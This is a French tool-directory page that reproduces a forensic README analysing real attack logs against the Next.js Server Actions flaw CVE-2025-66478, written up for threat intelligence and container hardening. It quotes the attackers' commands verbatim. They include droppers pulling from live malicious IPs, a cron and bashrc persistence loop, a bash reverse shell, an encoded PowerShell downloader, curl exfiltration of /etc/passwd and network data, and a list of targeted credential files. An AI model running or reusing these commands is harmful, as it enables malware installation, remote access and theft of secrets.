Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-66478 — Analyse de logs d'attaques réelles de CVE-2025-66478 (Next.js Server Actions RCE) avec des échantillons de malware, suivi d'IP d'attaquants, et leçons de durcissement de la sécurité des conteneurs. | Kitploit
Outils/GitHubGitHub/exptechtw/cve-2025-66478
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebAnalyse ForensiqueAnalyse de MalwareRenseignement sur les MenacesApprentissage et ÉducationRéponse aux Incidents
GitHubexptechtw/cve-2025-66478

CVE-2025-66478

Analyse de logs d'attaques réelles de CVE-2025-66478 (Next.js Server Actions RCE) avec des échantillons de malware, suivi d'IP d'attaquants, et leçons de durcissement de la sécurité des conteneurs.

211il y a 9 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager
Voir le dépôt

Analyse des journaux d'attaques réelles contre la vulnérabilité CVE-2025-66478 - RCE dans les Server Actions Next.js

Aperçu

Ce projet collecte des journaux d'attaques réelles enregistrés par une application Next.js 15.1.2 exposée sur Internet (s'exécutant dans un conteneur Docker). Ces journaux montrent comment la vulnérabilité CVE-2025-66478 est massivement scannée et exploitée par des outils automatisés.

Période d'enregistrement: 2025-12-04 ~ 2025-12-06 (environ 48 heures)

Informations sur l'environnement:

  • Framework: Next.js 15.1.2
  • Environnement d'exécution: Bun v1.2.20
  • Conteneur: Docker (Alpine Linux)
  • Fuseau horaire: Asia/Taipei

Statistiques des types d'attaques

1. Téléchargement et exécution de logiciels malveillants (Dropper/Downloader)

Les attaquants tentent d'exécuter des commandes de téléchargement et d'exécution de logiciels malveillants via la vulnérabilité.

IP source de l'attaqueURL de la charge malveillanteDescription
216.158.232.43http://216.158.232.43:12000/sex.shBotnet/mineur de crypto-monnaie
38.207.161.212http://38.207.161.212/agentProgramme agent malveillant
43.156.63.124http://43.156.63.124/tsdInstallation d'une porte dérobée cron
154.38.121.219res.qiqigece.top/nginx3Programme malveillant déguisé en nginx
47.79.42.91iot.632313373.xyz/nz.shScript de botnet IoT
47.79.65.237sup001.oss-cn-hongkong.aliyuncs.com/python1.shPorte dérobée/mineur
103.135.101.15http://103.135.101.15/wocaosinm.shScript malveillant
38.12.24.231http://38.12.24.231/kworkerProgramme malveillant déguisé en kernel worker
128.199.194.97http://128.199.194.97:9001/setup2.shScript d'initialisation

Exemple de commande d'attaque

# Attaque dropper typique
curl -fsSL http://38.207.161.212/agent -o /tmp/.a && chmod +x /tmp/.a && /tmp/.a

# Installation d'une porte dérobée persistante via cron
curl -s -o /etc/cron.hourly/tsd http://43.156.63.124/tsd && chmod +x /etc/cron.hourly/tsd

# Attaque persistante complexe (tentative de plusieurs méthodes de téléchargement + cron + bashrc)
u='http://38.12.24.231/kworker'; n='kworker';
for d in $HOME/.config/sys_monitor /tmp/.sys_monitor /dev/shm/.sys_monitor /var/tmp/.sys_monitor; do
  mkdir -p $d;
  if [ -w $d ]; then
    p="$d/$n";
    (curl -ks $u -o $p || wget -q --no-check-certificate $u -O $p || python3 -c "import urllib.request;urllib.request.urlretrieve('$u','$p')");
    chmod +x $p;
    nohup $p >/dev/null 2>&1 &
    (crontab -l 2>/dev/null | grep -v $n; echo "* * * * * $p >/dev/null 2>&1") | crontab -;
    echo "$p >/dev/null 2>&1 &" >> ~/.bashrc;
    echo "$p >/dev/null 2>&1 &" >> ~/.zshrc;
  fi;
done

2. Shell Inversé (Reverse Shell)

Les attaquants tentent d'établir une connexion shell inversée pour obtenir un accès interactif.

# Shell inversé Bash
bash -c "bash -i >& /dev/tcp/154.26.192.32/19899 0>&1"

3. Attaques PowerShell (ciblant Windows à mauvais escient)

Les attaquants supposent que la cible est un système Windows et tentent d'exécuter des commandes PowerShell.

# PowerShell malveillant encodé en Base64
powershell -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAE4AZQB0AC4AVwBlAGIAYwBsAGkAZQBuAHQAKQAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADUANgAuADIAMwA0AC4AMgAwADkALgAxADAAMwA6ADYAMwA5ADMAOAAvAG4AcgBDAHIAUQAnACkA

# Après décodage :
# IEX (New-Object System.Net.Webclient).DownloadString('http://156.234.209.103:63938/nrCrQ')

# Calculs mathématiques pour confirmer la vulnérabilité
powershell -c "41*271"      # = 11111 (code de vérification)
powershell -c "44225*41002" # = 1814113450

4. Collecte d'informations (Information Gathering)

Les attaquants tentent de collecter des informations système pour des attaques ultérieures.

# Collecte d'informations système et exfiltration
curl http://38.60.212.106:8000/?data=`(hostname;ip addr show;id;ip route show;ip neigh show;route -n;cat /etc/passwd;hostname -I) | base64 -w 0`

5. Vol d'identifiants (Credential Harvesting)

Les attaquants tentent de lire divers fichiers sensibles et identifiants.

Chemins sensibles tentés

CatégorieChemin
Identifiants cloud/root/.aws/credentials, /root/.aws/config
/root/.config/gcloud/credentials.db
/root/.config/gcloud/application_default_credentials
Clés SSH/root/.ssh/id_rsa, /root/.ssh/config
Identifiants Git/root/.git-credentials, /root/.gitconfig
Conteneur/K8s/root/.docker/config, /root/.kube/config
/var/lib/kubelet/config.yaml
Applications/proc/self/cwd/serviceAccountKey.json (Firebase)
/proc/self/cwd/prisma/.env, /proc/self/cwd/prisma/schema.prisma
Historique Shell/root/.bash_history, /root/.zsh_history
Outils cloud/root/.ossutilconfig (Alibaba Cloud OSS)
/root/.npmrc
Configuration système/etc/ansible/ansible.cfg, /etc/passwd, /etc/shadow

6. Fuite de variables d'environnement

Variables d'environnement du conteneur exfiltrées avec succès via la vulnérabilité :

HOSTNAME=6973aeebae41
BUN_INSTALL_BIN=/usr/local/bin
HOME=/root
PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/local/bun-node-fallback-bin
PWD=/app
TZ=Asia/Taipei
NODE_ENV=production
BUN_RUNTIME_TRANSPILER_CACHE_PATH=0

7. Exfiltration DNS

Les attaquants utilisent des requêtes DNS pour exfiltrer des données ou confirmer la vulnérabilité :

ping 5a58e4a0.log.dnslog.pp.ua.

Causes de l'échec des attaques

La plupart des attaques échouent en raison de la nature allégée du conteneur Alpine Linux :

Outil manquantImpact
curlImpossible de télécharger les charges utiles malveillantes
bashImpossible d'exécuter certaines syntaxes spécifiques à bash (comme les shells inversés)
powershellAttaques Windows inefficaces
pythonImpossible d'utiliser le téléchargeur Python

Bien que wget soit disponible, certains scripts malveillants dépendent toujours de curl ou bash en interne, ce qui entraîne leur échec.


Exemples de décodage Base64

Les journaux contiennent de nombreuses données encodées en Base64. Voici quelques résultats de décodage :

Fuite d'informations système

# digest: 'cm9vdAo='
Décodé : root

# digest: 'dGVzdAo='
Décodé : test

# digest: 'dnVsbmVyYWJpbGl0eV90ZXN0Cg=='
Décodé : vulnerability_test

# digest: 'dWlkPTAocm9vdCkgZ2lkPTAocm9vdCkgZ3JvdXBzPTAocm9vdCksMShiaW4pLDIoZGFlbW9uKSwzKHN5cyksNChhZG0pLDYoZGlzayksMTAod2hlZWwpLDExKGZsb3BweSksMjAoZGlhbG91dCksMjYodGFwZSksMjcodmlkZW8pCg=='
Décodé : uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Fuite de liste de répertoire

# Contenu du répertoire /tmp
dG90YWwgMjAKZHJ3eHJ3eHJ3dCAgICAxIHJvb3QgICAgIHJvb3QgICAgICAgICAgNDA5NiBEZWMgIDUgMTg6MDAgLgpkcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA0MDk2IERlYyAgNCAxMzozNiAuLgotcnd4ci14ci14ICAgIDEgcm9vdCAgICAgcm9vdCAgICAgICAgICA5ODQ4IERlYyAgNSAxODowMCBJTlNUQUxMCg==

Décodé :
total 20
drwxrwxrwt    1 root     root          4096 Dec  5 18:00 .
drwxr-xr-x    1 root     root          4096 Dec  4 13:36 ..
-rwxr-xr-x    1 root     root          9848 Dec  5 18:00 INSTALL

Statistiques des IP sources des attaques

Voici les adresses IP sources des attaques enregistrées :

Télécharger l’outil